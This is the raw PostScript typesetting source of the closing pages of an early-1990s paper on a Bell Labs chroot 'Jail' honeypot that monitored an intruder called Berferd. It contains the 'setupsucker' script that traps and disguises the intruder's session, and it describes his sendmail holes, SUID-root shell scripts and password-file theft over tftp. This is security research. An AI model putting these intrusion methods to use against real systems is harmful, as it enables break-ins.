411.3767 43.5060 lineto
410.9484 43.0983 lineto
410.4897 42.6978 lineto
410.0012 42.3049 lineto
409.4835 41.9202 lineto
408.9364 41.5436 lineto
408.3619 41.1764 lineto
407.7603 40.8190 lineto
407.1323 40.4715 lineto
406.4785 40.1343 lineto
405.7991 39.8076 lineto
405.0962 39.4925 lineto
404.3701 39.1890 lineto
403.6216 38.8973 lineto
402.8517 38.6181 lineto
402.0613 38.3514 lineto
401.2499 38.0973 lineto
400.4213 37.8569 lineto
399.5751 37.6301 lineto
398.7125 37.4171 lineto
397.8343 37.2182 lineto
396.9417 37.0337 lineto
396.0346 36.8635 lineto
395.1165 36.7084 lineto
394.1873 36.5682 lineto
393.2476 36.4430 lineto
392.2996 36.3333 lineto
391.3426 36.2388 lineto
390.3804 36.1601 lineto
389.4129 36.0969 lineto
388.4412 36.0495 lineto
387.4665 36.0178 lineto
386.4900 36.0020 lineto
386 36 lineto
F dostroke
388 36 moveto
387.5113 36.0020 lineto
386.5348 36.0178 lineto
385.5601 36.0494 lineto
384.5884 36.0969 lineto
383.6208 36.1600 lineto
382.6586 36.2387 lineto
381.7017 36.3332 lineto
380.7536 36.4429 lineto
379.8144 36.5679 lineto
378.8851 36.7081 lineto
377.9666 36.8633 lineto
377.0594 37.0334 lineto
376.1669 37.2180 lineto
375.2887 37.4168 lineto
374.4260 37.6298 lineto
373.5798 37.8566 lineto
372.7512 38.0970 lineto
371.9401 38.3509 lineto
371.1493 38.6177 lineto
370.3793 38.8970 lineto
369.6309 39.1886 lineto
368.9047 39.4921 lineto
368.2010 39.8076 lineto
367.5223 40.1339 lineto
366.8685 40.4710 lineto
366.2405 40.8185 lineto
365.6389 41.1760 lineto
365.0646 41.5430 lineto
364.5172 41.9197 lineto
363.9994 42.3044 lineto
363.5109 42.6972 lineto
363.0522 43.0978 lineto
362.6238 43.5055 lineto
362.2264 43.9199 lineto
361.8599 44.3411 lineto
361.5257 44.7673 lineto
361.2237 45.1988 lineto
360.9543 45.6350 lineto
360.7179 46.0752 lineto
360.5144 46.5195 lineto
360.3448 46.9662 lineto
360.2088 47.4154 lineto
360.1066 47.8666 lineto
360.0384 48.3191 lineto
360.0043 48.7725 lineto
360 49 lineto
F dostroke
gsave
newpath
413.5000 82 moveto
413.5000 46 lineto
F dostroke
grestore
gsave
newpath
359.5000 82 moveto
359.5000 46 lineto
F dostroke
grestore
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
372 55 moveto
(LOGS)
F F 28 0 4 0 0 fittext
restore
gsave
newpath
167.5000 155 moveto
153.1556 150.6140 lineto
153.1553 159.3851 lineto
167.5000 155 lineto
closepath
F doline
grestore
gsave
newpath
104.5000 155 moveto
153.1554 155 lineto
F dostroke
grestore
gsave
newpath
212.5000 74 moveto
208.1148 88.3447 lineto
216.8860 88.3444 lineto
212.5000 74 lineto
closepath
F doline
grestore
gsave
newpath
212.5000 110 moveto
212.5000 88.3446 lineto
F dostroke
grestore
164 356.5000 110 419.5000 rectpath
F dofillsave
F dostroke
gsave
newpath
387.5000 79 moveto
383.6180 93.4890 lineto
392.3838 93.1827 lineto
387.5000 79 lineto
closepath
F doline
grestore
gsave
newpath
388.5000 109 moveto
387.9779 93.3366 lineto
F dostroke
grestore
gsave
newpath
356.5000 155 moveto
342.1556 150.6140 lineto
342.1553 159.3851 lineto
356.5000 155 lineto
closepath
F doline
grestore
gsave
newpath
257.5000 155 moveto
342.1554 155 lineto
F dostroke
grestore
gsave
newpath
258.5000 117 moveto
272.8447 121.3851 lineto
272.8447 112.6148 lineto
258.5000 117 lineto
closepath
F doline
grestore
gsave
newpath
355.5000 117 moveto
272.8447 117 lineto
F dostroke
grestore
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
370 132 moveto
(LDCON)
F F 35 0 5 0 0 fittext
restore
origmtx setmatrix
systemdict /setpacking known {origpack setpacking} if end
showpage
%%EndDocument
 @endspecial 681 1091 a Fg(Figur)o(e)12 b(1:)35 b Ff(Connections)9
b(to)h(the)g(Jail.)p 300 1138 1351 2 v 0 1246 a(to)e(those)h(machines)h(from)
e(a)i(terminal)e(server)h(connected)h(to)e(a)h(Gandalf)g(switch.)14
b(He)c(connected)f(to)f(the)h(Gandalf)f(over)h(a)h(telephone)0
1296 y(line.)0 1364 y(I)g(checked)h(the)f(times)g(he)g(logged)f(in)g(to)h
(make)h(a)f(guess)h(about)e(the)h(time)g(zone)g(he)g(might)f(be)h(in.)15
b(Here)c(was)f(a)h(simple)f(graph)f(I)h(made)0 1414 y(of)g(his)g(session)g
(start)g(times)g(\(PST\):)733 1488 y Fb(1)202 b(2)352 1527
y(Jan)91 b(0123456789)q(01)q(234)q(56)q(78)q(901)q(23)329 1566
y(s)23 b(19)517 b(x)329 1606 y(s)23 b(20)517 b(xxxx)329 1645
y(m)23 b(21)180 b(x)23 b(x)68 b(xxxx)329 1685 y(t)23 b(22)404
b(xxxxx)47 b(x)329 1724 y(w)23 b(23)203 b(xx)68 b(x)23 b(xx)68
b(x)23 b(xx)329 1764 y(t)g(24)337 b(x)180 b(x)329 1803 y(f)23
b(25)248 b(x)45 b(xxxx)329 1842 y(s)23 b(26)329 1882 y(s)g(27)225
b(xxxx)136 b(xx)68 b(x)329 1921 y(m)23 b(28)203 b(x)23 b(x)179
b(x)329 1961 y(t)23 b(29)203 b(x)224 b(xxxx)24 b(x)329 2000
y(w)f(30)472 b(x)329 2040 y(t)23 b(31)91 b(xx)352 2079 y(Feb)g(0123456789)q
(01)q(234)q(56)q(78)q(901)q(23)329 2118 y(f)46 b(1)247 b(x)202
b(x)45 b(x)329 2158 y(s)h(2)359 b(x)22 b(xx)i(xxx)329 2197
y(s)46 b(3)247 b(x)45 b(x)90 b(xxxx)24 b(x)329 2237 y(m)46
b(4)448 b(x)0 2321 y Ff(It)11 b(seemed)j(to)d(suggest)h(a)g(sleep)g(period)f
(on)h(the)g(east)g(coast)g(of)g(the)g(U.S.,)h(but)e(programmers)i(are)f
(noted)g(for)f(strange)h(hours.)19 b(This)0 2371 y(analysis)10
b(wasn')o(t)g(very)h(useful,)f(but)f(was)i(worth)e(a)i(try)m(.)0
2439 y(Stanford')n(s)f(battle)g(with)g(Berferd)g(is)h(an)g(entire)f(story)g
(on)h(its)f(own,)h(and)g(I)g(only)e(know)i(the)f(outlines)g(of)g(their)g(ef)o
(forts.)17 b(It)10 b(took)g(them)0 2488 y(a)j(long)f(time)g(to)g(arrange)h
(for)f(a)h(trace,)h(and)f(they)f(eventually)g(obtained)f(several.)23
b(The)13 b(calls)g(came)h(from)e(the)h(Netherlands.)21 b(The)0
2538 y(Dutch)10 b(phone)g(company)g(refused)h(to)e(continue)h(the)g(trace)h
(to)e(the)h(caller)h(because)h(hacking)d(was)i(legal)f(and)h(there)f(was)h
(no)f(treaty)g(in)0 2588 y(place.)16 b(\(A)10 b(treaty)g(requires)g(action)g
(by)g(the)g(Executive)g(branch)h(and)f(approval)g(by)f(the)i(U.S.)g
(Senate.\))0 2656 y(In)e(January)m(,)i(W)n(ietse)g(V)-5 b(enema)11
b(of)f(Eindhoven)f(University)f(contacted)i(Stanford.)k(W)n(ietse)c(hunted)f
(down)g(a)i(group)d(of)i(hackers,)h(and)0 2706 y(identi\256ed)e(Berferd,)h
(including)e(his)i(name,)i(address,)f(and)f(phone)g(number)n(.)k(He)d(also)f
(kept)g(an)g(eye)h(on)f(Berferd')n(s)f(friends)h(and)g(their)p
eop
%%Page: 10 10
bop 150 66 a Fb(#)157 b(setupsuc)q(ker)26 b(login)150 145 y(SUCKERROO)q(T=)q
(/us)q(r/)q(spo)q(ol)q(/h)q(ack)q(er)150 184 y(login=`ec)q(ho)g($CDEST)f(|)e
(cut)g(-f4)h(-d!`)g(#)f(extract)i(login)g(from)f(service)h(name)150
224 y(home=`egr)q(ep)h("\303$login:)q(")g($SUCKERROO)q(T/)q(etc)q(/p)q(ass)q
(wd)g(|)d(cut)h(-d:)f(-f6`)150 303 y(PATH=/v:/)q(bs)q(d43)q(:/)q(sv;)116
b(export)25 b(PATH)150 342 y(HOME=$hom)q(e;)295 b(export)25
b(HOME)150 382 y(USER=$log)q(in)q(;)272 b(export)25 b(USER)150
421 y(SHELL=/v/)q(sh)q(;)272 b(export)25 b(SHELL)150 461 y(unset)f(CSOURCE)i
(CDEST)e(#)f(hide)h(these)h(Datakit)g(strings)150 539 y(#get)f(the)g(tty)f
(and)h(pid)g(to)f(set)h(up)f(the)h(fake)g(utmp)150 579 y(tty=`/bin)q(/w)q(ho)
i(|)d(/bin/grep)j($login)f(|)e(/usr/bin/c)q(ut)j(-c15-17)f(|)e(/bin/tail)j
(-1`)150 618 y(/usr/adm/)q(ut)q(too)q(ls)q(/te)q(ln)q(et)q(use)q(ro)q(n)f
(/usr/spo)q(ol)q(/ha)q(ck)q(er)q(/et)q(c/)q(utm)q(p)h(\\)329
658 y($login)f($tty)f($$)g(1>/dev/nul)q(l)i(2>/dev/nul)q(l)150
737 y(chown)e($login)h(/usr/spo)q(ol)q(/ha)q(ck)q(er/)q(de)q(v/)q(tty)q($t)q
(ty)h(1>/dev/nu)q(ll)g(2>/dev/nu)q(ll)150 776 y(chmod)e(622)g(/usr/spoo)q(l/)
q(ha)q(cke)q(r/)q(dev)q(/t)q(ty)q($tt)q(y)i(1>/dev/nul)q(l)g(2>/dev/nul)q(l)
150 855 y(/etc/chro)q(ot)g(/usr/spoo)q(l/)q(hac)q(ke)q(r)f(/v/su)g(-c)e
("$login")j(/v/sh)e(-c)g("cd)f($HOME;)329 894 y(exec)h(/v/sh)h(/etc/prof)q
(ile)q(")150 934 y(/usr/adm/)q(ut)q(too)q(ls)q(/te)q(ln)q(et)q(use)q(ro)q(ff)
h(/usr/spoo)q(l/h)q(ac)q(ke)q(r/e)q(tc)q(/ut)q(mp)g($tty)e(\\)329
973 y(>/dev/nu)q(ll)i(2>/dev/nu)q(ll)0 1106 y Fg(Figur)o(e)17
b(2:)45 b Ff(The)17 b Fe(setupsucker)f Ff(shell)f(script)g(emulates)h
Fe(login)p Ff(,)g(and)g(it)e(is)i(quite)e(tricky)m(.)31 b(W)m(e)16
b(had)f(to)g(make)i(the)e(environment)0 1156 y(variables)c(look)f(reasonable)
i(and)g(attempted)f(to)f(maintain)h(the)g(Jail')n(s)g(own)f(special)i
Fc(utmp)f Ff(entries)g(for)g(the)g(residents.)18 b(W)m(e)11
b(had)h(to)0 1206 y(be)f(careful)f(to)g(keep)h(errors)f(in)f(the)i(setup)f
(scripts)f(from)h(the)h(hacker)r(')n(s)f(eyes.)p 300 1253 1351
2 v 0 1361 a(activities.)0 1429 y(At)g(Stanford,)f(Berferd)h(was)g(causing)g
(mayhem.)16 b(He)11 b(had)f(subverted)f(a)i(number)f(of)f(machines)i(and)f
(probed)f(many)i(more.)k(Stephen)0 1479 y(Hansen)f(at)f(Stanford)e(and)i(T)m
(sutomu)g(Shimomura)g(of)g(Los)g(Alamos)g(had)g(some)h(of)e(the)h(networks)f
(bugged.)23 b(T)m(sutomu)12 b(modi\256ed)0 1529 y Fe(tcpdump)e
Ff(to)f(provide)h(a)h(time-stamped)f(recording)g(of)g(each)i(packet.)k(This)
11 b(allowed)f(him)g(to)g(replay)g(real-time)h(terminal)f(sessions.)0
1579 y(Berferd)g(attacked)g(many)g(systems)g(at)f(Stanford.)15
b(They)10 b(got)e(very)i(good)f(at)g(stopping)f(his)h(attacks)h(within)e
(minutes)h(after)h(he)g(logged)0 1628 y(into)h(a)j(new)f(machine.)23
b(In)12 b(one)h(instance)g(they)f(watched)h(his)f(progress)h(using)f(the)g
Fe(ps)h Ff(command.)23 b(His)13 b(login)e(name)j(changed)f(to)0
1678 y Fe(uucp)d Ff(and)g(then)g Fe(bin)g Ff(before)g(the)g(machine)h
(\252had)g(disk)f(problems.\272)0 1746 y(Berferd)15 b(used)g(Stanford)g(as)g
(a)h(base)g(for)f(many)g(months.)30 b(There)16 b(are)f(tens)h(of)e(megabytes)
i(of)f(logs)g(of)f(his)h(activites.)29 b(He)16 b(had)0 1796
y(remarkable)9 b(persistence)g(at)g(a)g(very)g(boring)e(job)g(of)i(poking)e
(computers.)14 b(Once)c(he)e(got)g(an)h(account)g(on)f(a)h(machine,)h(there)f
(was)g(little)0 1845 y(hope)g(for)g(the)h(system)g(administrator)n(.)j
(Berferd)c(had)h(a)g(\256ne)g(list)e(of)i(security)f(holes.)14
b(He)c(knew)g(obscure)g Fe(sendmail)e Ff(parameters)j(and)0
1895 y(used)g(them)g(well.)16 b(\(Y)l(es,)c(some)f Fe(sendmail)p
Ff(s)f(have)i(security)e(holes)h(for)f(logged-in)f(users,)j(too.)k(Why)10
b(is)h(such)g(a)g(lar)o(ge)g(and)g(complex)0 1945 y(program)f(allowed)f(to)h
(run)f(as)i Fe(r)n(oot)p Ff(?\))k(He)c(had)f(a)g(collection)f(of)h
(thoroughly)d(invaded)j(machines,)h(complete)g(with)e(SUID-to-)p
Fc(root)0 1995 y Ff(shell)h(scripts)g(usually)f(stored)h(in)f
Fc(/usr/lib/term/.s)p Ff(.)14 b(Y)l(ou)c(do)g(not)f(want)h(to)g(give)g(him)g
(an)g(account)h(on)f(your)f(computer)n(.)0 2124 y Fg(7.)21
b(Berferd)12 b(comes)e(home)83 2220 y Ff(In)i(the)g(Sunday)f(New)i(Y)l(ork)e
(T)o(imes)i(on)f(21)f(April)g(1991,)h(John)g(Markof)o(f)g(broke)f(some)i(of)f
(the)g(Berferd)g(story)m(.)20 b(He)13 b(said)f(that)0 2269
y(authorities)g(were)j(pursuing)e(several)h(Dutch)g(hackers,)i(but)d(were)i
(unable)f(to)f(prosecute)h(them)g(because)i(hacking)d(is)h(not)f(illegal)0
2319 y(under)d(Dutch)g(law)m(.)0 2387 y(The)j(hackers)f(heard)g(about)g(the)f
(article)h(within)e(a)i(day)g(or)g(so.)20 b(W)n(ietse)13 b(collected)e(some)i
(mail)f(between)g(several)h(members)g(of)e(the)0 2437 y(Dutch)h(cracker)i
(community)m(.)22 b(It)12 b(was)i(clear)f(that)f(they)g(had)h(bought)e(the)i
(\256ction)f(of)g(our)g(machine')n(s)h(demise.)23 b(One)13
b(of)g(Berferd')n(s)0 2486 y(friends)d(found)f(it)g(strange)i(that)e(the)h(T)
o(imes)h(didn')o(t)e(include)g(our)h(computer)g(in)g(the)g(list)f(of)h(those)
g(damaged.)0 2554 y(On)i(1)g(May)g(Berferd)f(logged)g(into)g(the)h(Jail.)20
b(By)11 b(this)g(time)h(we)h(could)e(recognize)h(him)g(by)f(his)h(typing)e
(speed)j(and)e(errors)h(and)g(the)0 2604 y(commands)i(he)g(used)f(to)f(check)
i(around)f(and)g(attack.)24 b(He)14 b(probed)e(various)h(computers,)h(while)f
(consulting)e(the)i(network)f Fe(whois)0 2654 y Ff(service)g(for)f(certain)g
(brands)g(of)g(hosts)g(and)h(new)f(tar)o(gets.)19 b(He)11 b(did)g(not)f
(break)i(into)e(any)h(of)g(the)h(machines)g(he)g(tried)e(from)h(our)g(Jail.)0
2704 y(Of)e(the)h(hundred-odd)d(sites)j(he)f(attacked,)i(three)e(noticed)g
(the)g(attempts,)h(and)g(followed)e(up)h(with)f(calls)i(from)f(very)g
(serious)h(security)p eop
%%Page: 11 11
bop 0 42 a Ff(of)o(\256cers.)21 b(I)11 b(explained)h(to)f(them)h(that)f(the)h
(hacker)g(was)h(legally)e(untouchable)g(as)h(far)g(as)h(I)e(knew)m(,)i(and)f
(the)g(best)g(we)g(could)f(do)g(was)0 91 y(log)f(his)h(activities)f(and)i
(supply)e(logs)g(to)h(the)g(victims.)17 b(Berferd)11 b(had)g(many)h(bases)g
(for)f(laundering)f(his)g(connections.)18 b(It)10 b(was)i(only)0
141 y(through)d(persistence)i(and)f(luck)g(that)g(he)h(was)g(logged)f(at)g
(all.)16 b(W)m(ould)9 b(the)h(system)h(administrator)e(of)h(an)h(attacked)g
(machine)g(prefer)0 191 y(a)g(log)f(of)h(the)g(cracker)r(')n(s)g(attack)g(to)
f(vague)i(deductions?)k(Damage)c(control)e(is)g(much)i(easier)f(when)g(the)g
(actual)g(damage)h(known.)k(If)0 241 y(a)11 b(system)g(administrator)d
(doesn')o(t)i(have)h(a)g(log,)e(he)i(should)e(reload)h(his)g(compromised)g
(system)h(from)f(the)g(release)i(tapes.)0 308 y(The)f(systems)g
(administrators)e(and)h(their)f(management)j(agreed)f(with)e(me,)j(and)e
(asked)h(that)e(I)i(keep)f(the)h(Jail)f(open.)0 376 y(At)f(the)g(request)g
(of)g(management)h(I)f(shut)f(the)h(Jail)g(down)g(on)f(3)h(May)m(.)16
b(Berferd)9 b(tried)f(to)g(reach)i(it)f(a)g(few)h(times,)g(and)f(went)g(away)
m(.)15 b(The)0 426 y(last)10 b(I)g(heard)h(was)g(that)e(he)i(was)g(operating)
e(from)h(a)h(computer)f(in)g(Sweden.)0 556 y Fg(8.)21 b(Conclusions)83
652 y Ff(For)10 b(me,)i(the)e(most)g(important)f(lesson)h(was)83
740 y Fe(if)e(a)h(hacker)h(obtains)e(a)h(login)e(on)i(a)g(machine,)g(ther)n
(e)h(is)f(a)g(good)f(chance)i(he)f(can)g(become)h Fc(root)f
Fe(sooner)g(or)g(later)-5 b(.)15 b(Ther)n(e)83 790 y(ar)n(e)c(many)f(buggy)g
(pr)n(ograms)g(that)f(run)h(at)g(high)f(privileged)g(levels)i(that)e(offer)h
(opportunities)e(for)h(a)h(cracker)-5 b(.)18 b(If)10 b(he)g(gets)83
840 y(a)g(login)f(on)h(your)g(computer)-5 b(,)11 b(you)f(ar)n(e)i(in)d(tr)n
(ouble.)0 928 y Ff(Other)h(conclusions)f(are:)42 1017 y Fd(\017)20
b Ff(Though)12 b(the)g(Jail)h(was)g(an)g(interesting)e(and)h(educational)h
(exercise,)h(it)e(was)h(not)f(worth)g(the)g(ef)o(fort.)22 b(It)12
b(is)g(too)g(hard)g(to)g(get)h(it)83 1066 y(right,)d(and)h(never)h(quite)e
(secure.)19 b(A)11 b(better)f(arrangement)i(involves)e(a)h(throwaway)g
(machine)h(with)e(real)h(security)g(holes,)g(and)83 1116 y(a)g(monitoring)d
(machine)j(on)f(the)g(same)i(Ethernet)e(to)g(capture)h(the)f(bytes.)16
b(Our)10 b(version)f(of)h(the)h(monitoring)d(machine)j(had)f(the)83
1166 y(transmit)f(wire)i(in)e(the)h(transceiver)h(cable)g(cut)f(to)g(avoid)f
(any)i(possibility)c(of)j(releasing)g(telltale)g(packets.)42
1243 y Fd(\017)20 b Ff(Breaking)10 b(into)f(computers)h(requires)g(a)h(good)e
(list)g(of)h(security)g(holes)g(and)g(a)h(lot)e(of)h(persistence.)42
1320 y Fd(\017)20 b Ff(Processing)10 b(these)h(security)f(pokes)g(isn')o(t)f
(much)i(fun)f(any)g(more.)0 1408 y(Once)i(you)f(go)f(out)h(of)g(the)g
(computer)g(environment)f(that)h(you)f(control,)h(tracing)g(is)g(dif)o
(\256cult.)17 b(It)10 b(can)i(involve)e(many)i(carriers,)g(law)0
1458 y(enforcement)f(agencies,)h(and)e(even)h(the)f(U.S.)h(Senate.)0
1526 y(There)j(are)f(other)g(services)g(we)h(should)e(monitor)n(.)21
b Fe(Tftp)12 b Ff(is)h(certainly)f(one:)20 b(it)12 b(easily)h(provided)e(the)
i(password)g(\256le)g(from)f(a)i(lar)o(ge)0 1576 y(number)c(of)h(machines)g
(I)f(tested.)16 b(I)11 b(would)e(also)i(like)f(to)g(monitor)f(unsuccessful)h
(connection)g(attempts)h(to)e(unused)i(UDP)f(and)h(TCP)0 1625
y(ports)e(to)h(detect)h(unusual)e(scanners.)0 1755 y Fg(9.)21
b(Acknowledgements)83 1851 y Ff(A)9 b(number)g(of)g(people)f(worked)h(very)g
(hard)g(on)f(this)g(problem.)15 b(They)9 b(include)f(Stephen)h(Hansen,)h(T)m
(odd)f(Atkins,)f(and)h(others)g(at)0 1901 y(Stanford,)h(T)m(sutomu)f
(Shimomura)h(of)g(Los)g(Alamos,)h(and)f(W)n(ietse)h(V)-5 b(enema)12
b(of)d(Eindhoven)g(University)m(.)14 b(Locally)m(,)d(Paul)f(Glick)f(and)0
1951 y(Diana)i(D'Angelo)e(worked)h(on)g(the)g(Jail.)15 b(Steve)c(Bellovin)e
(provided)g(numerous)h(insights,)f(traps,)h(and)h(a)g(dedicated)f(bait)g
(machine.)0 2000 y(Jim)g(Reeds)h(of)o(fered)g(a)f(number)h(of)f(helpful)f
(suggestions.)0 2130 y Fg(10.)21 b(Refer)o(ences)173 2222 y
Ff([1])f(Cheswick,)10 b(W)l(.R.)g Fe(The)g(Design)g(of)f(a)g(Secur)n(e)i
(Internet)e(Gateway)n(.)15 b Ff(USENIX)9 b(Summer)i(Conference)f
(Proceedings,)242 2271 y(June)h(1990.)173 2348 y([2])20 b(Stoll,)9
b(C.)h Fe(The)h(Cuckoo')-5 b(s)10 b(Egg:)k(T)n(racking)c(a)g(Spy)g(Thr)n
(ough)g(the)g(Maze)g(of)f(Computer)h(Espionage.)k Ff(Pocket)d(Books,)242
2398 y(New)g(Y)l(ork,)f(1990.)0 2492 y(W)n(illiam)h(R.)h(Cheswick)f(has)h
(been)g(a)g(member)h(of)e(the)h(technical)f(staf)o(f)h(in)f(the)h(Computer)e
(Science)j(Research)g(division)c(of)j(A)-5 b(T&T)0 2542 y(Bell)10
b(Laboratories)h(since)g(1987.)17 b(He)11 b(has)g(worked)g(on)f(networking,)g
(system)h(administration,)f(and)h(security)m(.)17 b(Previously)9
b(he)i(was)0 2591 y(a)g(system)f(programmer)h(for)e(several)i(university)d
(computer)i(centers,)h(a)g(programmer)f(and)g(electrical)h(engineer)f(for)f
(the)h(American)0 2641 y(Newspapers)g(Publishing)d(Association)h(Research)i
(Institute,)e(and)h(a)h(contractor)f(to)f(the)h(Navy)m(.)15
b(Bill)8 b(has)h(an)g(under)o(graduate)g(degree)0 2691 y(in)h(Fundamental)g
(Science)h(from)f(Lehigh)g(University)m(.)p eop
%%Trailer
end
userdict /end-hook known{end-hook}if
%%EOF